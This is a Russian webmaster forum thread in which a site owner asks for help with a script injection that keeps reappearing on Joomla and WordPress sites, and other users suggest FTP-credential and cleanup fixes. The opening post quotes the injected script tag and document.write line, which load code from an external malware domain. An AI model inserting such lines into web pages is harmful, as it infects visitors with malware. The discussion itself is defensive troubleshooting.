Вредоносный код на сайтах!Поиск и искоринение!

poiskspider
На сайте с 27.06.2010
Offline
50
679

Нужна помощь.При положительном стечении обстоятельств,готов выписать денежное вознагрождение:2cents::2cents:

Значит суть проблемы.

Есть хостинг на котором стоят 3 сайта:

2 сайта---Joomla+Virtuemart (скрипты этих магазинов были куплены)

1 сайт--блог на WP

Магазины стоят уже месяц а блог был добавлен недавно.

Вообщем на магазинах а позже и на блоге появился скрипт который посылает на сторонний ресурс на котором собственно и расположен вирус.

Сам скрипт(это то что я нашел) назодится в HTML-файлах

<html>

<script src=http://tsm.or.kr/tesamo/indexs.php ></script><body bgcolor="#FFFFFF">
</body>
</html>

и в самих скриптах сайтов с разрешением JS(в самомо низу скриптов страницы)

document.write('<script src=http://tsm.or.kr/tesamo/indexs.php ><\/script>');

С помощью специального PHP-файла я отыскал все эти скрипты расположенные в HTML и JS.Почистил в ручную и удалил.Но через время этот вредоносный скрипт снова появился на страницах сайтов.

Тупая переустановка сайтов с нуля тоже не помогает,коды скриптов через время снова появляются.

Можно сообразить что на сайте находится что-то еще ненужное,но вот сам его отыскать не могу,нужна помощь знающих людей.

Очень жду Вашей помощи.

Заранее благодарен.

Готов пообщатся через Асю 308468ноль три восемь

firefox19
На сайте с 05.11.2009
Offline
34
#1

Если уж работаете с ФТП, то ставьте фаервол и проверяйтесь периодически. Была аналогичная проблема на заре знакомства с ВЕБ-ом.

Ваши идеи - наша работа (http://yaweb.ru) Продам Сайт агентства недвижимости (/ru/forum/561489)
poiskspider
На сайте с 27.06.2010
Offline
50
#2
firefox19:
Если уж работаете с ФТП, то ставьте фаервол и проверяйтесь периодически. Была аналогичная проблема на заре знакомства с ВЕБ-ом.

Да я все это прекрасно понимаю и знаю.Спасибо за внимание к моей прорблеме,но лучше подскажите как её решить?

firefox19
На сайте с 05.11.2009
Offline
34
#3

poiskspider, т.е. у Вас стоит фаервол и антивирус (именно вместе)? Тогда можно было бы подумать дальше.

poiskspider
На сайте с 27.06.2010
Offline
50
#4
firefox19:
poiskspider, т.е. у Вас стоит фаервол и антивирус (именно вместе)? Тогда можно было бы подумать дальше.

Да стоит антивирус(NOD32),но фаервол сейчас отключен/Если знаеете суть проблемы давайте пообщаемся по асе 308468ноль38.Я же выше писал что готов даже заплатить вознагрождение за решение проблемы.

plusweb
На сайте с 12.01.2005
Offline
123
#5
poiskspider:
Но через время этот вредоносный скрипт снова появился на страницах сайтов.
Тупая переустановка сайтов с нуля тоже не помогает,коды скриптов через время снова появляются.
Можно сообразить что на сайте находится что-то еще ненужное,но вот сам его отыскать не могу,нужна помощь знающих людей.
Очень жду Вашей помощи.
Заранее благодарен.
Готов пообщатся через Асю 308468ноль три восемь

Как правило это происходит при утрате логина и пароля ftp.

Лечится просто:

1. Вылечить компьютер(ы) с которого осуществляется доступ по ftp.

2. Изменить логин и пароль ftp.

3. Удалить все установленные ftp клиенты.

4. Поставить новый и никогда не сохранять логин и пароль в клиенте ftp - всегда вводить заново.

5. Удалить посторонний код с сайтов.

6. Пользоваться в будущем антивирусом.

asto
На сайте с 13.10.2005
Offline
180
#6

poiskspider, поменяйте пароль. Поищите на своем сервере, в директориях с движками, файлы, которых не должно быть в дистрибутиве движка. У меня вот недавно была такая лажа, был произведен лом движка, в корневую директорию сайта загрузили текстовые файлы с программными кодами и потом запускали рассылку виря. Благо хостер вовремя сайт заблокировал и вместе разобрались что к чему там. Лом 100% был не через ftp.

poiskspider, если была вирусная активность, то хостер может узнать через ftp был лом или же взлом через дырку движка. Я на своем сайте нашел скрипты злоумышленников, удалил их и в движке запретил доступ к некоторым модулям, через которые мог быть произведен лом. Пока тьфу тьфу, нормуль:)

Mad_Man
На сайте с 10.11.2008
Offline
162
#7
plusweb:
Лечится просто:
1. Вылечить компьютер(ы) с которого осуществляется доступ по ftp.
2. Изменить логин и пароль ftp.
3. Удалить все установленные ftp клиенты.
4. Поставить новый и никогда не сохранять логин и пароль в клиенте ftp - всегда вводить заново.
5. Удалить посторонний код с сайтов.
6. Пользоваться в будущем антивирусом.

Ещё есть вариант из одного шага:

1. Поставить Linux.
poiskspider
На сайте с 27.06.2010
Offline
50
#8

Линукс это конечно хорошо,но вот одна с ним проблема,многие специфичеспрооги на нем не хотят рабоать или работают не корректно!

Спасибо всем за помощь,буду ковырять а авось что-то и выйдет!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий